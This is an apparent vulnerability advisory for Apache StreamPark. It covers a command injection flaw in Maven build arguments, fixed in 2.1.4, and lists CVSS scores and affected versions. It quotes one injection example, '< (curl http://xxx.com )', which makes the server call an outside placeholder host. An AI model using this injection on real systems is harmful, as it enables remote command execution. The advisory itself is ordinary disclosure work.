CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
AI Score
Confidence
High
EPSS
Percentile
76.8%
In streampark, the project module integrates Mavenβs compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Background:
In the βProjectβ module, the maven build argsΒ Β β<β operator causes command injection. e.g : β< (curlΒ http://xxx.com )β will be executed as a command injection,
Mitigation:
all users should upgrade to 2.1.4,Β The β<β operator will blockedγ
Vendor | Product | Version | CPE |
---|---|---|---|
apache | streampark | * | cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:* |
[
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark (incubating)",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
]